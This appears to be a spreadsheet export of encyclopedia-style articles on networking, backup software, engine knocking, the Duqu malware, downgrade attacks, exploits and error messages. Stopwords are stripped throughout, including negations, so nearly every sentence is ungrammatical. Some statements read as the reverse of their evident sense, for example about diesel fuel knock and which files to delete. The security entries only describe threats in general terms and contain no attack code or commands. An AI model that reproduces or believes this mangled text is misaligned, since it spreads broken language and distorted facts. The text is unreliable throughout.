retrofit programs. incentive levels vary utility. diego electric provides estimated timeline application process, allows customers understand custom process require effort behalf customer energy certification partner qualify rebate. also electrical energy efficiency united states farms renewable energy credit references external links rebate utility rebate program overview tool pacific electric website energy information administration energystar: utility regional energy efficiency program sponsors (eeps) resources</t>
  </si>
  <si>
    <t>Energy-Efficient Ethernet</t>
  </si>
  <si>
    <t>computer networking, energy-efficient ethernet (eee) enhancements twisted-pair, twinaxial, backplane, optical fiber ethernet physical-layer variants reduce power consumption periods data activity. intention reduce power consumption more, retaining full compatibility existing equipment.the institute electrical electronics engineers (ieee), ieee 802.3az task force, developed standard. first study group call interest november 2006, official standards task force authorized 2007. ieee ratified final standard september 2010. some companies introduced technology reduce power required ethernet standard ratified, using name green ethernet. some energy-efficient switch integrated circuits developed ieee 802.3az energy-efficient ethernet standard finalized. potential savings 2005, network interface controllers united states computers, switches, routers) used estimated terawatt-hours electricity. according researcher lawrence berkeley laboratory, energy-efficient ethernet potentially save estimated us$450 million year energy costs u.s. most savings would come homes ($200 million) offices ($170 million), remaining million data centers. concepts power reduction accomplished ways. fast ethernet faster links, constant significant energy used physical layer transmitters active regardless whether data sent. could sleep mode data sent, energy could saved. when controlling software firmware decides data needs sent, issue low-power idle (lpi) request ethernet controller physical layer phy. send symbols specified time onto link, disable transmitter. refresh signals sent periodically maintain link signaling integrity. when data transmit, normal idle signal sent predetermined period time. data link considered always operational, receive signal circuit remains active even transmit path sleep mode. green ethernet green ethernet technology superset 802.3az standard. addition link load power savings energy-efficient ethernet, green ethernet works ways. first, detects link status, allowing port switch power standby mode connected device, computer, active. second, detects cable length adjusts power used transmission accordingly. standard switches provide enough power send signal meters (330 ft). however, often unnecessary soho environment, meters cabling typical rooms. moreover, small data centers also benefit approach since majority cabling confined single room meters cabling among servers switches. addition pure power saving benefits green ethernet, backing transmit power shorter cable runs reduces alien crosstalk, improves overall performance cabling system. green ethernet also encompasses efficient circuitry ethernet chips, offload engines ethernet interface cards intended network servers. april 2008, term used switches, and, july 2008, used wireless routers featured user-selectable periods wi-fi reduce energy consumption.green ethernet first employed home products. however, port counts mean significant energy savings going made using technology home. turning existing devices idle likely provide immediate saving. projected power savings percent estimated using green ethernet switches, translating longer product life reduced heat dissipation. also green computing watt initiative power ethernet (poe) references external links ieee p802.3az energy efficient ethernet task force "green ethernet". archived original june 2009. retrieved july 2011. blog energy-efficient ethernet techniques news analyses, circa 2009.</t>
  </si>
  <si>
    <t>Tahoe-LAFS</t>
  </si>
  <si>
    <t>tahoe-lafs (tahoe least-authority file store) free open, secure, decentralized, fault-tolerant, distributed data store distributed file system. used online backup system, serve file host similar freenet, depending front-end used insert access files tahoe system. tahoe also used raid-like fashion using multiple disks make single large redundant array inexpensive nodes (rain) pool reliable data storage. system designed implemented around "principle least authority" (pola), described brian warner (one project's original founders) idea "that component system little power authority needs done". strict adherence convention enabled cryptographic capabilities provide minimum privileges necessary perform given task asking agents. rain array acts storage volume; servers need trusted confidentiality integrity stored data. history tahoe-lafs started 2006 online backup services company data actively developed since 2007. 2008, brian warner zooko wilcox-o'hearn published paper tahoe international workshop storage security survivability.when data closed 2009, tahoe-lafs became free software project general public license transitive grace license, allows owners code twelve months profit work releasing 2010, tahoe-lafs mentioned tool censorship electronic frontier foundation. 2013, hackathon projects 30th anniversary. functionality tahoe-lafs client sends unencrypted file https server. https server passes file tahoe-lafs storage client encrypts file uses erasure coding store fragments file multiple storage drives.tahoe-lafs features "provider-independent security", integrity confidentiality files guaranteed algorithms used client, independent storage servers, fail operated untrusted entities. files encrypted using aes, split using erasure coding, subset original servers storing file chunks need available order recreate original file. default parameters k=3, n=10, file shared across different servers, accessing requires correct function servers.tahoe provides little control nodes data stored. fork patched version tahoe-lafs exists 2011, made anonymous networks i2p, support multiple introducers. there also version microsoft windows. distributed site within network. contrast normal tahoe-lafs operation, tahoe-lafs used together location nodes disguised. this allows anonymous distributed grids formed. also cephfs (file system) coda (file system) comparison distributed file systems freenet glusterfs moose file system lizardfs ifolder list distributed file systems lustre (file system) parallel virtual file system xtreemfs ipfs references external links official website</t>
  </si>
  <si>
    <t>Engine knocking</t>
  </si>
  <si>
    <t>knocking (also knock, detonation, spark knock, pinging pinking) spark ignition internal combustion engines occurs combustion air/fuel mixture cylinder result propagation flame front ignited spark plug, pockets air/fuel mixture explode outside envelope normal combustion front. fuel-air charge meant ignited spark plug only, precise point piston's stroke. knock occurs peak combustion process longer occurs optimum moment four-stroke cycle. shock wave creates characteristic metallic "pinging" sound, cylinder pressure increases dramatically. effects engine knocking range inconsequential completely destructive. knocking confused pre-ignition—they separate events. however, pre-ignition followed knocking. phenomenon detonation described november 1914 letter lodge brothers (spark plug manufacturers, sons oliver lodge) settling discussion regarding cause "knocking" "pinging" motorcycles. letter stated early ignition give rise detonating instead usual expansion, sound produced detonation metal parts tapped hammer. investigated described harry ricardo experiments carried 1916 1919 discover reason failures aircraft engines. normal combustion under ideal conditions common internal combustion engine burns fuel/air mixture cylinder orderly controlled fashion. combustion started spark plug crankshaft degrees prior dead center (tdc), depending many factors including engine speed load. this ignition advance allows time combustion process develop peak pressure ideal time maximum recovery work expanding gases.the spark across spark plug's electrodes forms small kernel flame approximately size spark plug gap. grows size, heat output increases, allows grow accelerating rate, expanding rapidly combustion chamber. this growth travel flame front combustible fuel-air itself, rayleigh-taylor instability (resulting hot, low-density combustion gasses expanding relatively cold dense unburnt fuel-air mix) rapidly stretches burning zone complex fingers burning much greater surface area simple spherical ball flame would (this latter process enhanced accelerated pre-existing turbulence fuel-air mixture). normal combustion, flame front moves throughout fuel/air mixture rate characteristic particular mixture. pressure rises smoothly peak, nearly available fuel consumed, pressure falls piston descends. maximum cylinder pressure achieved crankshaft degrees piston passes tdc, force applied piston (from increasing pressure applied surface piston) give hardest push precisely piston's speed mechanical advantage crank shaft gives best recovery force expanding gases, thus maximizing torque transferred crankshaft. abnormal combustion when unburned fuel/air mixture beyond boundary flame front subjected combination heat pressure certain duration (beyond delay period fuel used), detonation occur. detonation characterized almost instantaneous, explosive ignition least pocket fuel/air mixture outside flame front. local shockwave created around pocket, cylinder pressure rise sharply possibly beyond design limits causing damage. (detonation actually efficient deflagration, usually avoided damaging effects engine components.) detonation allowed persist extreme conditions many engine cycles, engine parts damaged destroyed. simplest deleterious effects typically particle wear caused moderate knocking, ensue engine's system cause wear parts trapped filter. such wear gives appearance erosion, abrasion, "sandblasted" look, similar damage caused hydraulic cavitation. severe knocking lead catastrophic failure form physical holes melted pushed piston cylinder head (i.e., rupture combustion chamber), either depressurizes affected cylinder introduces large metal fragments, fuel, combustion products system. hypereutectic pistons known break easily shock waves.detonation prevented following techniques: retarding ignition timing fuel high octane rating, increases combustion temperature fuel reduces proclivity detonate enriching air–fuel ratio alters chemical reactions combustion, reduces combustion temperature increases margin detonation reducing peak cylinder pressure decreasing manifold pressure reducing throttle opening boost pressure reducing load enginebecause pressure temperature strongly linked, knock also attenuated controlling peak combustion chamber temperatures compression ratio reduction, exhaust recirculation, appropriate calibration engine's ignition timing schedule, careful design engine's combustion chambers cooling system well controlling initial intake temperature. addition certain materials lead thallium suppress detonation extremely well certain fuels used. addition tetraethyl lead (tel), soluble organolead compound added gasoline, common discontinued reasons toxic pollution. lead dust added intake charge also reduce knock various hydrocarbon fuels. manganese compounds also used reduce knock petrol fuel. knock less common cold climates. aftermarket solution, water injection system employed reduce combustion chamber peak temperatures thus suppress detonation. steam (water vapor) suppress knock even though added cooling supplied. certain chemical changes must first occur knock happen, hence fuels certain structures tend knock easily others. branched chain paraffins tend resist knock straight chain paraffins knock easily. theorized lead, steam, like interfere various oxidative changes occur combustion hence reduce knock. turbulence, stated, important effect knock. engines good turbulence tend knock less engines poor turbulence. turbulence occurs engine inhaling also mixture compressed burned. many pistons designed "squish" turbulence violently fuel together ignited burned, reduces knock greatly speeding burning cooling unburnt mixture. example modern side valve flathead engines. considerable portion head space made come close proximity piston crown, making much turbulence near tdc. early days side valve heads done much lower compression ratio used given fuel. also engines sensitive ignition advance less power.knocking less unavoidable diesel engines, fuel injected highly compressed towards compression stroke. there short fuel injected combustion starting. time already quantity fuel combustion chamber ignite first areas greater oxygen density prior combustion complete charge. this sudden increase pressure temperature causes distinctive diesel 'knock' 'clatter', must allowed engine design. careful design injector pump, fuel injector, combustion chamber, piston crown cylinder head reduce knocking greatly, modern engines using electronic common rail injection levels knock. engines using indirect injection generally lower levels knock direct injection engines, greater dispersal oxygen combustion chamber lower injection pressures providing complete mixing fuel air. diesels actually suffer exactly "knock" gasoline engines since cause known fast rate pressure rise, unstable combustion. diesel fuels actually prone knock gasoline engines diesel engine time knock occur fuel oxidized expansion cycle. gasoline engine fuel slowly oxidizing time compressed spark. this allows changes occur structure/makeup molecules critical period high temperature/pressure. knock detection large variation fuel quality, atmospheric pressure ambient temperature well possibility malfunction, every modern combustion engine contains mechanisms detect prevent knocking. control loop permanently monitoring signal knock sensors (commonly piezoelectric sensor able translate vibrations electric signal). characteristic pressure peak knocking combustion detected ignition timing retarded steps degrees. signal normalizes indicating controlled combustion ignition timing advanced fashion keeping engine best possible operating point so-called ″knock limit″. modern knock control-loop systems able adjust ignition timings every cylinder individually. depending specific engine boost pressure regulated simultaneously. this performance kept optimum mostly eliminating risk engine damage caused knock e.g. running octane fuel. early example turbocharged saab engines, system called automatic performance control used reduce boost pressure caused engine knock. knock prediction since avoidance knocking combustion important development engineers, variety simulation technologies developed identify engine design operating conditions knock might expected occur. this enables engineers design ways mitigate knocking combustion whilst maintaining high thermal efficiency. since onset knock sensitive in-cylinder pressure, temperature autoignition chemistry associated local mixture compositions within combustion chamber, simulations account aspects thus proven effective determining knock operating limits enabling engineers determine appropriate operating strategy. knock control objective knock control strategies attempt optimize trade-off protecting engine damaging knock events maximizing engine's output torque. knock events independent random process. impossible design knock controllers deterministic platform. single time history simulation experiment knock control methods able provide repeatable measurement controller's performance random nature arriving knock events. therefore, desired trade-off must done stochastic framework could provide suitable environment designing evaluating different knock control strategies performances rigorous statistical properties. references further reading laganá, armando a.m.; lima, leonardo justo, joão arruda, benedito santos, m.d. (2018). "identification combustion detonation spark ignition engines using current signal". fuel. 227: 469–477. doi:10.1016/j.fuel.2018.04.080. s2cid 104060623. gaeta, alessandro; giglio, veniero; police, giuseppe; rispoli, natale (2013). "modeling in-cylinder pressure oscillations knocking conditions: general approach based damped wave equation". fuel. 104: 230–243. doi:10.1016/j.fuel.2012.07.066. giglio, veniero; police, giuseppe; rispoli, natale; iorio, biagio; gaeta, alessandro (2011). "experimental evaluation reduced kinetic models simulation knock engines". technical paper series. vol. doi:10.4271/2011-24-0033. gaeta, alessandro; giglio, veniero; police, giuseppe; reale, fabrizio; rispoli, natale (2010). "modeling pressure oscillations knocking conditions: partial differential wave equation approach". technical paper series. vol. doi:10.4271/2010-01-2185. predictive combustion simulations “downsized” direct injection spark-ignition engines: solutions pre-ignition (“mega-knock”), misfire, extinction, flame propagation conventional “knock”, cmcl innovations, accessed june 2010. engine basics: detonation pre-ignition, allen cline, accessed june 2007. giglio, police, rispoli, gaeta, cecere, ragione, della (2009). "experimental investigation current engines knock detection". technical paper series. vol. doi:10.4271/2009-01-2745. taylor, charles fayette (1985). internal-combustion engine theory practice: combustion, fuels, materials, design. isbn 9780262700276. external links naca combustion knock spark-ignition engine naca ionization knock zone internal combustion engine naca interdependence various types autoignition knock</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>duqu collection computer malware discovered september 2011, thought kaspersky labs related stuxnet worm created unit 8200. duqu exploited microsoft windows's zero-day vulnerability. laboratory cryptography system security (crysys lab) budapest university technology economics hungary discovered threat, analysed malware, wrote 60-page report naming threat duqu. duqu name prefix "~dq" gives names files creates. nomenclature term duqu used variety ways: duqu malware variety software components together provide services attackers. currently includes information stealing capabilities background, kernel drivers injection tools. part malware written unknown high-level programming language, dubbed "duqu framework". c++, python, ada, many checked languages. however, suggested duqu written custom object oriented framework compiled microsoft visual studio 2008. duqu flaw flaw microsoft windows used malicious files execute malware components duqu. currently flaw known, truetype-font related problem win32k.sys. operation duqu process using duqu unknown goals. operation might related operation stuxnet. relationship stuxnet symantec, based crysys team managed thibault gainche report, continued analysis threat, called "nearly identical stuxnet, completely different purpose", published detailed technical paper cut-down version original report appendix. symantec believes duqu created authors stuxnet, authors access source code stuxnet. worm, like stuxnet, valid, abused digital signature, collects information prepare future attacks. mikko hyppönen, chief research officer f-secure, said duqu's kernel driver, jminet7.sys, similar stuxnet's mrxcls.sys f-secure's back-end system thought stuxnet. hyppönen said used make duqu's digital signature (only observed case) stolen c-media, located taipei, taiwan. certificates expire august 2012 revoked october 2011 according symantec.another source, dell secureworks, reports duqu related stuxnet. however, considerable growing evidence duqu closely related stuxnet. experts compared similarities found three points interest: installer exploits zero-day windows kernel vulnerabilities. components signed stolen digital keys. duqu stuxnet highly targeted related nuclear program iran. microsoft word zero-day exploit like stuxnet, duqu attacks microsoft windows systems using zero-day vulnerability. first-known installer (aka dropper) file recovered disclosed crysys uses microsoft word document exploits win32k truetype font parsing engine allows execution. duqu dropper relates font embedding, thus relates workaround restrict access t2embed.dll, truetype font parsing engine patch released microsoft december 2011 installed. microsoft identifier threat ms11-087 (first advisory issued november 2011). purpose duqu looks information could useful attacking industrial control systems. purpose destructive, known components trying gather information. however, based modular structure duqu, special payload could used attack type computer system means thus cyber-physical attacks based duqu might possible. however, personal computer systems found delete recent information entered system, cases total deletion computer's hard drive. internal communications duqu analysed symantec, actual exact method replicates inside attacked network fully known. according mcafee, duqu's actions steal digital certificates (and corresponding private keys, used public-key cryptography) attacked computers help future viruses appear secure software. duqu uses 54×54 pixel jpeg file encrypted dummy files containers smuggle data command control center. security experts still analyzing code determine information communications contain. initial research indicates original malware sample automatically removes days (the malware stores setting configuration files), would limit detection.key points are: executables developed stuxnet using stuxnet source code discovered. executables designed capture information keystrokes system information. current analysis shows code related industrial control systems, exploits, self-replication. executables found limited number organizations, including involved manufacturing industrial control systems. exfiltrated data used enable future stuxnet-like attack might already used basis stuxnet attack. command control servers some command control servers duqu analysed. seems people running attack predilection centos servers, leading researchers believe zero-day exploit servers scattered many different countries, including germany, belgium, philippines, india china. kaspersky published multiple blogposts command control servers. also references</t>
  </si>
  <si>
    <t>Duplicity (software)</t>
  </si>
  <si>
    <t>duplicity software suite provides encrypted, digitally signed, versioned, local remote backup files requiring little remote server. released terms general public license (gpl), duplicity free software. duplicity operates scheme first archive complete (full) backup, subsequent (incremental) backups differences latest full incremental backup. chains consisting full backup series incremental backups recovered point time incremental steps taken. incremental backups missing, incremental backups following cannot reconstructed. using gnupg, librsync, tar, rdiff. transmit data backup repository, ssh/scp/sftp, local file access, rsync, ftp, amazon google cloud storage, rackspace cloud files, others. duplicity works best unix-like operating systems (such linux, bsd, though used windows cygwin windows subsystem linux. currently duplicity supports deleted files, full unix permissions, directories, symbolic links, fifos, device files, hard links. déjà graphical user interface duplicity. also list backup software duplicati re-implementation duplicity references external links duplicity home page</t>
  </si>
  <si>
    <t>Duplicati</t>
  </si>
  <si>
    <t>duplicati backup client securely stores encrypted, incremental, compressed remote backups local files cloud storage services remote file servers. duplicati supports various online backup services like onedrive, amazon backblaze, rackspace cloud files, tahoe lafs, google drive, also servers support ssh/sftp, webdav, ftp. duplicati uses standard components rdiff, zip, aescrypt, gnupg. this allows users recover backup files even duplicati available. released terms lesser general public license (lgpl), duplicati free software. technology duplicati written mostly implemented completely within clr, enables cross-platform. runs well 32-bit 64-bit versions windows, macos linux using either .net framework mono. duplicati graphical user interface wizard-style interface command-line version headless environments. both interfaces core thus features capabilities. command-line version similar duplicity interface. duplicati unique features usually found commercial systems, remote verification backup files, disk snapshots, backup open files. disk snapshots performed windows linux. history original duplicati project started june 2008 intended produce graphical user interface duplicity program. this included port duplicity code windows, dropped september 2008, work clean re-implementation began. this re-implementation includes sub-programs found duplicity, rdiff, ftp, etc. this initial version duplicati initial release june 2009. 2012, work duplicati started, complete rewrite. includes storage engine allows efficient, incremental, continuous backups. user interface web-based, makes possible install duplicati headless systems like servers nas. also responsive, easily used mobile devices. implementation duplicati command-line interface call common component called main, serves binding point operations supported. currently encryption, compression storage component considered subcomponent loaded runtime, making possible third-party developer inject subcomponent duplicati without access source need modify duplicati itself. license type also flexible enough allow redistribution duplicati closed-source storage provider. duplicati designed independent provider possible, means storage medium supports common commands (get, put, list, delete) work duplicati. duplicity model, duplicati based, relies heavily components system, librdiff, tcftp others. since duplicati intended cross-platform, unlikely components available platforms, duplicati re-implements components instead. most notably, duplicati features rdiff aescrypt implementation work system supports common language runtime. limitations duplicati frontend duplicati intended used single machine display attached. however, also possible install duplicati windows service linux daemon, duplicati system tray starting duplicati service. this limitation addressed duplicati interface used headless systems. duplicati extremely slow file listings, browsing file tree restores take long time. since duplicati produces incremental backups, corrupt missing incremental volume render following incremental backups next full backup) useless. duplicati regularly tests backup detect corrupted files early. duplicati stores file modification date, metadata like permissions attributes. this addressed duplicati also list backup software references external links official website</t>
  </si>
  <si>
    <t>Dual-homed</t>
  </si>
  <si>
    <t>dual-homed dual-homing refer either ethernet device network interface, redundancy purposes, firewall technology, firewall architectures implementing preventive security. example dual-homed devices enthusiast computing motherboards incorporate dual ethernet network interface cards. usage ethernet lans, dual-homing network topology whereby networked device built network interface. each interface port connected network, connection active time. connection activated primary connection fails. traffic quickly rerouted backup connection event link failure. this feature designed provide telecommunications grade reliability redundancy ethernet networks. multihoming general category, referring device network connection. firewalls firewall dual-homing provides first-line defense protection technology keeping untrusted bodies compromising information security violating trusted network space. dual-homed host dual-homed gateway) system fitted network interfaces (nics) sits untrusted network (like internet) trusted network (such corporate network) provide secure access. dual-homed general term proxies, gateways, firewalls, server provides secured applications services directly untrusted network. dual-homed hosts seen special case bastion hosts multi-homed hosts. they fall category application-based firewalls.dual-homed hosts firewalls provided forward datagrams unconditionally.other firewall architectures include network-layer firewall types screening router, screened-host, screened subnet. also multihoming firewall (computing) router (computing) references</t>
  </si>
  <si>
    <t>Error correction mode</t>
  </si>
  <si>
    <t>error correction mode (ecm) optional transmission mode built class 1/2/2.0 machines modems. automatically detects corrects errors transmission process sometimes caused telephone line noise. page data divided known octets (small blocks data). once receiver received octets examines (using check-sums) advises transmitting octets error. transmitter need resend blocks error rather whole page. this generally means coded likely succeed transmitting copy page(s) noisy line. norm rather exception. some machines capability enable disable function.</t>
  </si>
  <si>
    <t>Error message</t>
  </si>
  <si>
    <t>error message information displayed unforeseen problem occurs, usually computer device. modern operating systems graphical user interfaces, error messages often displayed using dialog boxes. error messages used user intervention required, indicate desired operation failed, relay important warnings (such warning computer user almost hard disk space). error messages seen widely throughout computing, part every operating system computer hardware device. proper design error messages important topic usability fields human–computer interaction. common error messages following error messages commonly seen modern computer users: access denied this error occurs user privileges file, locked program user. device ready this error often occurs floppy disk disk) disk drive system tries perform tasks involving disk. file found file concerned damaged, moved, deleted, caused error. alternatively, file simply might exist, user mistyped name. more frequent command line interfaces graphical user interfaces files presented iconically users type file names. disk space this error occurs hard drive (nearly) full. this, user close programs free swap file usage) delete files (normally temporary files, files backed up), bigger hard drive. memory this error occurs system memory tries load file large store ram. close programs install memory. [program name] stopped working. this message displayed microsoft windows vista later program causes general protection fault invalid page fault. notable error messages abort, retry, fail? notoriously confusing error message seen ms-dos command file name another notoriously common confusing error message seen ms-dos blue screen death microsoft windows reactos operating systems, screen appears windows reactos longer severe error. roughly analogous kernel panic linux, unix, macos. can't extend error message acorn dfs. stores files non-fragmented contiguous disk space, error caused trying extend open random-access file space already occupied another file. guru meditation error message commodore amiga, roughly analogous kernel panic bsod, also adopted recent products virtualbox. http file found error seen world wide web, usually resulting link page moved deleted, mistyped fire unix warning printer fire", literally typewriter unix error message confusing obsolete word "typewriter", sometimes output nature error seemingly entirely different load letter error several laser printers simply asked user "letter" size paper confusing syntax error seen many computer systems received instructions format understand http error found world wide stating gateway timeout occurred internet link. error 1603 error states problem installation computer program, error particularly occurs windows computer systems. &lt;application name&gt; stopped error message commonly found android devices, states current running application unexpectedly stops working crashes. success error messages instance, posix) occurs program detected error condition, actual error message printing routine relies library print error reported operating system case, errno.h), underlying system calls succeeded report errors case, errno this form sloppy error handling particularly confusing user. [connection time error mac] error occurs systems takes time connect wireless networks. fail pets with rise services twitter, end-user facing error messages http http started displayed whimsical characters, termed fail pets error mascots. term "fail pet" coined, least first used print, mozilla engineer fred wenzel post blog entitled "why wikipedia might need fail-pet mozilla not." sean rintel argues error messages critical strategic moment brand awareness loyalty. fail pets interest marketers result brand recognition (especially earned media). "however, recognition carries danger highlighting service failure." famous fail twitter's fail whale (see twitter service outages). other fail pets include: technica: moon shark (march 2013) farmville facebook: cow. github: octocat google: broken robot (march 2011) icloud: cloud apple system emoticon-style face macintosh: palliser furniture: between cushions (january 2018) tumblr: tumbeasts (january 2011) twitter: fail whale twitter robot (july 2008) youtube: televisions main site), light static inside video window (embedded video) cartoon network: [asia]: domo google chrome: t-rex patreon: helmet floating space message format form error messages take varies operating systems programs. error messages hardware devices, like computer peripherals, take form dedicated lights indicating error condition, brief code needs interpreted using look-up sheet manual, detailed message display. computers, error messages take form text printed console, presented part graphical user interface. error messages often presented dialog box, makes cause following mode error user interaction. many cases original error avoided error prevention techniques. instead raising error message system design avoided conditions caused error.while various graphical user interfaces different conventions displaying error messages, several techniques become common: dialog box, pop-up message, appears window screen, blocking interaction computer acknowledged. sheets form dialog attached specific window. notification icons appear notify user condition without interrupting work. windows, notification icons appear system tray. notification icons appear menu bar, take form application's icon "bouncing" dock. gnome user interface unix systems display notification icons panel. minor errors displayed status bar, small portion application's window display brief messages user.the three main factors influence design error messages technical limitations, amount information presented, kind user input required. some systems technical limitations constrain amount information error message contain. example, printer sixteen-character alphanumeric display show limited amount information once, need display terse error messages. even computer monitors, programmer must consider smallest monitor user might reasonably use, ensure error messages screen. nature error determines amount information required effectively convey error message. complex issue require detailed error message order adequately inform user problem. security when designing error messages, software designers take care avoid creating security vulnerabilities. designer give user enough information make intelligent decision, much information user overwhelmed confused. extraneous information hidden default placed separate location. error message expose information exploited cracker obtain information otherwise difficult obtain. examples systems show either "invalid user" "invalid password" depending incorrect, error page server provides complete technical description error including source code fragment. also alert dialog human–computer interaction interaction design usability user error user interface design exception handling references external links useful list apart) avoid embarrassed error messages matters) oops! ruined life. (cooper journal) archived 2014-08-25 wayback machine</t>
  </si>
  <si>
    <t>Error-tolerant design</t>
  </si>
  <si>
    <t>error-tolerant design (also: human-error-tolerant design) unduly penalize user human errors. human equivalent fault tolerant design allows equipment continue functioning presence hardware faults, "limp-in" mode automobile electronics unit would employed something like oxygen sensor failed. behavior shaping constraints prevent errors forcing functions behavior-shaping constraints technique error-tolerant design. example interlock lockout reverse transmission moving car. this prevents errors, prevention errors effective technique error-tolerant design. practice known poka-yoke japan introduced shigeo shingo part toyota production system. mitigation effects errors next effective technique error-tolerant design mitigation limitation effects errors made. example checking confirmation function "are sure" dialog harmless option preselected computer software action could severe consequences made error, deleting overwriting files (although consequence inadvertent file deletion reduced days concept like trash introduced interfaces). adding great mitigating factor circumstances become hindrance, confirmation becomes mechanical become detrimental example, prompt asked every file batch delete, tempted simply agree prompt, even file deleted accidentally. another example google's spell checking searches performed search engine. spell checking minimises problems caused incorrect spelling highlighting error user, also providing link search using correct spelling instead. searches like commonly performed using combination edit distance, soundex, metaphone calculations. also human factors human reliability murphy's references human, chapter five donald norman (2002), design everyday things. external links publications soartech (may rather changed removed) (pdf) making reliable distributed systems presence hardware errors (thesis, pdf, long)</t>
  </si>
  <si>
    <t>Dragon (cipher)</t>
  </si>
  <si>
    <t>dragon stream cipher developed information security institute william millan help dawson, kevin chen, matt henricksen, leonie simpson, hoonjae lee, sangjae moon. dragon first published stream cipher employ nonlinear feedback state update function nonlinear function output, long minimum cycle guaranteed clock-like structure. feedback output generated together permutation takes input data state words according full-positive difference set. these design choices make difficult employ standard analysis methods. permutation uses s-boxes designed using evolutionary search heuristics. cipher phase focus candidate estream project, satisfied requirements speed security. cipher targeted fast software implementations versions different lengths exists. version selected phase dragon-128. patented. dragon successfully attacked date, pieprzyk found biases within primary non-linear component cipher. some suggested security cipher weaker intended designers. however, methods detect biases require large amount data, would generated actual algorithm, alternative interpretation exists: published analysis shows cipher quite secure. external links estream page dragon notes</t>
  </si>
  <si>
    <t>Downgrade attack</t>
  </si>
  <si>
    <t>downgrade attack, also called bidding-down attack version rollback attack, form cryptographic attack computer system communications protocol makes abandon high-quality mode operation (e.g. encrypted connection) favor older, lower-quality mode operation (e.g. cleartext) typically provided backward compatibility older systems. example flaw found openssl allowed attacker negotiate lower version client server. this common types downgrade attacks. opportunistic encryption protocols starttls generally vulnerable downgrade attacks, they, design, fall back unencrypted communication. websites rely redirects unencrypted http encrypted https also vulnerable downgrade attacks (e.g., sslstrip), initial redirect protected encryption. attack downgrade attacks often implemented part man-in-the-middle (mitm) attack, used enabling cryptographic attack might possible otherwise. downgrade attacks consistent problem ssl/tls family protocols; examples attacks include poodle attack. downgrade attacks protocol take many forms. researchers classified downgrade attacks respect four different vectors, represents framework reason downgrade attacks follows: there recent proposals exploit concept prior knowledge enable clients (e.g. browsers) protect sensitive domain names certain types downgrade attacks exploit clients' support legacy versions non-recommended ciphersuites (e.g. support forward secrecy authenticated encryption) poodle, clienthello fragmentation, variant drown (aka "the special drown") downgrade attacks.removing backward compatibility often prevent downgrade attacks. however, sometimes client server recognize up-to-date manner prevents them. example, server user agent implement http strict transport security user agent knows server (either previously accessed https, "hsts preload list"), user agent refuse access site vanilla http, even malicious router represents server https-capable. also blockchain cryptanalysis side-channel attack references</t>
  </si>
  <si>
    <t>Tcpcrypt</t>
  </si>
  <si>
    <t>computer networking, tcpcrypt transport layer communication encryption protocol. unlike prior protocols like (ssl), tcpcrypt implemented extension. designed team security networking experts: andrea bittau, mike hamburg, mark handley, david mazières, boneh quinn slack. tcpcrypt published internet draft. experimental user-space implementations available linux, freebsd windows. there also linux kernel implementation. tcpinc (tcp increased security) working group formed june 2014 ietf work standardizing security extensions protocol. 2019 working group released 8547 8548 experimental standard tcpcrypt. description tcpcrypt provides opportunistic encryption either side support extension, protocol falls back regular unencrypted tcp. tcpcrypt also provides encryption application using tcp, even ones know encryption. this enables incremental seamless deployment.unlike tls, tcpcrypt authentication, passes unique "session application; application token authentication. this means authentication scheme used, including passwords certificates. also larger part public-key connection initiation client side, reduce load servers mitigate attacks. history first draft protocol specification published july 2010, reference implementations following august. however, initial meetings ietf, proponents protocol failed gain traction standardization project went dormant 2011.in 2013 2014, following edward snowden's global surveillance disclosures agencies governments, ietf took strong stance protecting internet users surveillance. this aligns tcpcrypt's goals ubiquitous transparent encryption, revived interest standardization protocol. official ietf mailing list created tcpcrypt march 2014, followed formation tcpinc (tcp increased security) working group june version draft specification. performance tcpcrypt enforces timestamps adds options data packet, amounting bytes packet compared plain tcp. with mean observed packet size packets bytes, lead overhead useful bandwidth. this bytes overhead issue internet connections faster 64kbs, issue dial internet users. compared tls/ssl, tcpcrypt designed lower performance impact. part tcpcrypt built-in authentication, implemented application itself. cryptography primitives used reduce load server side, single server usually provide services clients reverse. implementations current user space implementations considered experimental reportedly unstable systems. also support ipv6 yet, currently supported linux kernel version. expected tcpcrypt becomes standard, operating systems come tcpcrypt support built-in, making user space solution unnecessary. also dtls ipsec obfuscated earlier failed proposal opportunistic encryption references external links tcpcrypt.org tcpinc working group charter ietf slides usenix 2010 presentation, explaining basics tcpcrypt</t>
  </si>
  <si>
    <t>Sum (Unix)</t>
  </si>
  <si>
    <t>legacy utility available unix unix-like operating systems. this utility outputs 16-bit checksum argument file, well number blocks take disk. different checksum algorithms use. posix abandoned favor cksum. overview program generally useful historical interest. part posix. algorithms typically available: checksum sysv checksum. both weaker already weak 32-bit used cksum.the default algorithm freebsd implementations checksum. switching algorithms done command line options.the commonly used algorithms follows. sum, freebsd cksum: initialize checksum byte input stream perform 16-bit bitwise right rotation checksum byte checksum, apply modulo result, thereby keeping within bits result 16-bit checksumthe algorithm appeared seventh edition unix. system sum, freebsd cksum: checksum0 bytes input stream modulo checksum1 checksum0 modulo checksum0 checksum checksum1 modulo checksum1 result 16-bit checksum calculated initial 32-bit plain byte syntax utility invoked command line according following syntax: [option]... [file]... possible option parameters being: checksum algorithm, blocks (defeats --sysv sysv checksum algorithm, bytes blocks --help display help screen exit --version output version information exitwhen file parameter given, file standard input used input file. example use: example sum: example using standard input, printf avoid newline: also core utilities unxutils port native win32 references external links single unix specification, version 1997, opengroup.org specify checksum algorithm utilities open group base specifications issue 2018 edition, opengroup.org indicates removed sum(1) version unix programmer's manual sum(1) manual pages coreutils sum(1) freebsd general commands manual states algorithms options cksum sum(1) linux user manual user commands sum(1) solaris user commands reference manual unix tree, tuhs.org source code versions unix</t>
  </si>
  <si>
    <t>Exploit (computer security)</t>
  </si>
  <si>
    <t>exploit (from english verb exploit, meaning something one’s advantage") piece software, chunk data, sequence commands takes advantage vulnerability cause unintended unanticipated behavior occur computer software, hardware, something electronic (usually computerized). such behavior frequently includes things like gaining control computer system, allowing privilege escalation, denial-of-service (dos related ddos) attack. terms, exploit akin 'hack'. classification there several methods classifying exploits. common exploit communicates vulnerable software. remote exploit works network exploits security vulnerability without prior access vulnerable system. local exploit requires prior access vulnerable system usually increases privileges person running exploit past granted system administrator. exploits client applications also exist, usually consisting modified servers send exploit accessed client application. common form exploits client applications browser exploits. exploits client applications also require interaction user thus used combination social engineering method. another classification action vulnerable system; unauthorized data access, arbitrary code execution, denial service examples. many exploits designed provide superuser-level access computer system. however, also possible several exploits, first gain low-level access, escalate privileges repeatedly reaches highest administrative level (often called "root"). after exploit made known authors affected software, vulnerability often fixed patch exploit becomes unusable. that reason black hackers well military intelligence agencies' hackers publish 